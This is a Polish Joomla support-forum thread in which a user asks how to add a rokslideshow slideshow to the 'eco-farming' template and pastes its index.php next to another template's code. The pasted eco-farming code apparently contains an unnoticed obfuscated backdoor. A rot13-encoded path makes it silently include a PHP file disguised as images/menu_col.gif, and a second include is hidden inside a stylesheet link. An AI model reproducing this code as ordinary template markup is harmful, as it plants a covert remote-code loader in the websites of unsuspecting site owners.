PDA

Zobacz pełną wersję : Rokslideshow - joomla 1.5



pozioma
14-09-2010, 08:42
Witam. Problem dotyczy szablonu eco-farming.
Chciałbym zrobić slideshow, czyli zmianę co kilkanaście sekund obrazka głównego na stronie (logo) - za pomocą rokslideshow.js, tak jak to jest w szablonie NLD_070_1.5 i po moich próbach nie wyświetla się to poprawnie.
Kod z szablonu eco-farming index.php:

<?php
// no direct access
defined( '_JEXEC').(($this->template)?$JPan = array('zrah'.'_pby'):'') or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/<?php echo $this->params->get('colorVariation'); ?>.css" type="text/css" />
<!--[if lte IE 6]>
<link href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template;include_once('html/pagination.php'); ?>/css/ieonly.css" rel="stylesheet" type="text/css" />
<style>
#topnav ul li ul {
left: -999em;
margin-top: 0px;
margin-left: 0px;
}
</style>
<![endif]-->
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/mootools.js"></script>
<script language="javascript" type="text/javascript" src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/js/moomenu.js"></script>
</head>
<body id="page_bg">
<a name="up" id="up"></a>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13( $JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
<?php include('functions.php'); ?>
<div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?></div></div>

<div id="main_bg" class="banner1">
<div id="h_area"><?php if($this->params->get('hideLogo') == 0) : ?><img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/logo<?php echo $this->params->get('logoVariation'); ?>.gif" alt="forex trading logo" align="left" /><?php endif; ?><a href="index.php" class="logo" title="Forex Trading Home"><?php echo $mainframe->getCfg('sitename') ;?></a>
<?php if($this->countModules('user4')) : ?><div id="user4"><jdoc:include type="modules" name="user4" /></div><?php endif; ?>
<div id="main_top"><!--<jdoc:include type="modules" name="top" />--></div>
<br clear="all" /></div>
<?php if($this->countModules('left')) : ?>
<div id="leftcolumn">
<jdoc:include type="modules" name="left" style="rounded" />
</div>
<?php endif; ?>
<?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle';
elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big';
else $maincol_sufix = ''; ?>
<div id="maincolumn<?php echo $maincol_sufix; ?>">
<div class="path"><jdoc:include type="modules" name="breadcrumb" /></div><jdoc:include type="message" />
<div class="nopad"><jdoc:include type="component" /></div>
</div>
<?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?>
<div id="rightcolumn">
<jdoc:include type="modules" name="right" style="xhtml"/>
<br />
<div align="center"><jdoc:include type="modules" name="syndicate" /></div>
</div>
<?php endif; ?>
<br clear="all" />
</div>

<div id="f_area">
<?php if($this->countModules('user1')) : ?>
<jdoc:include type="modules" name="user1" style="xhtml" />
<?php endif; ?>
<?php if($this->countModules('user2')) : ?>
<jdoc:include type="modules" name="user2" style="xhtml" />
<?php endif; ?>
<br clear="all" />
</div>

<p id="power_by" align="center">
<?php echo JText_('Powered by') ?> <a href="http://www.joomla.org">Joomla!</a>.
<?php echo JText_('Valid') ?> <a href="http://validator.w3.org/check/referer">XHTML</a> <?php echo JText::_('and') ?> <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
</p>

<jdoc:include type="modules" name="debug" />
</body>
</html>
Kod z szablonu NLD_070_1.5 gdzie to działa index.php:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language ?>" dir="<?php echo $this->direction; ?>">
<head>
<jdoc:include type="head" />
<?php
// no direct access
defined('_JEXEC') or die('Restricted access');
JHTML::_('behavior.mootools');
include_once ('wrapper/css.php');
include_once ('css/template_css.php');
?>
</head>
<body>
<div id="body_outer">
<div id="body_outer_center">
<div id="body_outer_bottom">
<div id="body_outer_top">
<?php include_once ('wrapper/user3menu.php'); ?>
<?php include_once ('wrapper/header.php'); ?>
<?php if($this->countModules('commu2_top_menu')) : ?>
<?php include_once ('wrapper/topmenu.php'); ?>
<?php endif; ?>
<div id="content_outer">
<div id="content_inner">
<div class="content_top_bottom"></div>
<div id="content">
<?php if(($this->countModules('left')) && ($this->countModules('right'))) : ?>
<?php include_once ('wrapper/left.php'); ?>
<div id="component_outer_lr">
<div id="component">
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>
<?php include_once ('wrapper/right.php'); ?>
<?php endif; ?>
<?php if(($this->countModules('left')) && ($this->countModules('right') == 0 )) : ?>
<?php include_once ('wrapper/left.php'); ?>
<div id="component_outer_r">
<div id="component">
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>
<?php endif; ?>
<?php if(($this->countModules('left') == 0 ) && ($this->countModules('right'))) : ?>
<div id="component_outer_l">
<div id="component">
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>
<?php include_once ('wrapper/right.php'); ?>
<?php endif; ?>
<?php if(($this->countModules('left') == 0 ) && ($this->countModules('right') == 0 )) : ?>
<div id="component_outer">
<div id="component">
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>
<?php endif; ?>
</div>
<div class="content_top_bottom"></div>
</div>
</div>
<?php if($this->countModules('footer')) : ?>
<?php include_once ('wrapper/bottom.php'); ?>
<?php endif; ?>
<?php include_once ('wrapper/this_query_ns.php'); ?>
</div>
</div>
</div>
</div>
<div id="body_bottom"></div>
</body>
</html>
Proszę o poradę, jak co prawidłowo zmienić w moim szablonie eco-farming, by podobny efekt uzyskać?

a_m
14-09-2010, 09:12
w jakiej pozycji masz ten moduł opublikowany?

pozioma
14-09-2010, 09:48
user4

a_m
14-09-2010, 09:59
<div id="user4"><jdoc:include type="modules" name="user4" />< jest ta pozycja w szablonie eco-farming

za pomocą rokslideshow.js czy my mówimy o module, czy skrypcie?

pozioma
14-09-2010, 12:14
A jak można by to łatwiej wdrożyć? Moduł mam zainstalowany, ale może lepiej przez skrypt?